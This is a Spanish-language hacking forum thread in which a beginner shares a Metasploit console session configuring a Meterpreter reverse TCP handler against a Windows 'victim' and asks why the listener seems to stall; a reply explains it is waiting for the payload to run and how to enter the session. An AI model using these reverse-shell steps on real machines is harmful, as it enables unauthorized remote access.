elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Porque termina el proceso de escucha en metasploit?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Porque termina el proceso de escucha en metasploit?  (Leído 2,749 veces)
j0x1_zurc

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Porque termina el proceso de escucha en metasploit?
« en: 1 Septiembre 2017, 04:51 am »

El problema es que cuando termino de configurar la consola de metasploit para hacer un ataque en windows, termina el proceso de escuccha, y queda algo como esto:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.3      yes       The listen address
   LPORT     443              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit
  • Exploit running as background job.
  • Started reverse TCP handler on 192.168.1.3:443
msf exploit(handler) >


y hasta alli queda, no se si tengo algo malo, y me puedan corregir?
tambien,anteriormente, no funcionaba el payload cuando se abria el programa en windows, se quedaba atascado en esto:
msf exploit(handler) > exploit
  • Exploit running as background job.
  • Started reverse TCP handler on 192.168.1.3:443

PD: Soy nuevo en esto.


· Los temas van en su respectivo subforo
>aquí las reglas del foro
-Engel Lex
« Última modificación: 1 Septiembre 2017, 05:20 am por engel lex » En línea

lilux

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Porque termina el proceso de escucha en metasploit?
« Respuesta #1 en: 28 Septiembre 2017, 13:29 pm »

No te preocupes, no es un problema. Eso significa que se queda a la espera de que suceda se ejecute el archivo en la máquina víctima. Una vez que se ejecute el archivo en la máquina víctima, verás como en la máquina atacante muestra una sesión abierta. Tras eso, solo tendrías que acceder a la sesión activa con session -i "n" donde n sería el id de la sesión.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines